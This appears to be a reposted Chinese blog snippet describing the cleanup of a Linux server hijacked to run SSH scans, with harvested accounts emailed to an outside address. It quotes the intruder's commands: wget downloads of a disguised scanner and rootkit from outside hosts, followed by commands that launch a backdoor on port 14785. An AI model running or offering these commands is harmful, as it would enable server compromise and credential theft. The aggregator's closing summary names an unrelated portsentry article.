為什么80%的碼農都做不了架構師？>>> ??

http://www.myhack58.com/Article/48/66/2012/35805.htm

http://edu.21cn.com/linux/g_188_704380-1.htm

客戶反映一臺linux服務器老向外ssh掃描，登陸到服務器上，查看進程發現大量ssh-scan在運行，運行用戶為mircte，查找ssh-scan這個文件，確定所在位置/var/log目錄下 黑客進入服務器后所做的操作： 1. 向/var/tmp/下上傳了兩個惡意程序 其中wtf為向外掃描其它服務器的ssh-scan黑客軟件，.access.log文件下存放有rootkit后門，服務器被當成了肉雞跳板，開放14785端口等待入侵者連接，掃描其它服務器所得到的賬號都發送到diavolu_gol@yahoo.com這個郵箱。 2. 入侵者登陸記錄 85.120.78.140的IP來自羅馬尼亞。 3. wget http://pinky.clan.su/scan/wtf.jpg ; tar zxvf wtf.jpg wget adelinuangell.lx.ro/ryo.tar tar xvf ryo.tar cd .access.log 。/config Ady 14785 。/run 結束進程。刪掉程序。。刪掉用戶。修改root密碼。

轉載于:https://my.oschina.net/macleo/blog/284399

與50位技術專家面對面20年技術見證，附贈技術全景圖

總結

以上是生活随笔為你收集整理的Linux/Centos服务器安装portsentry防恶意端口扫描的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。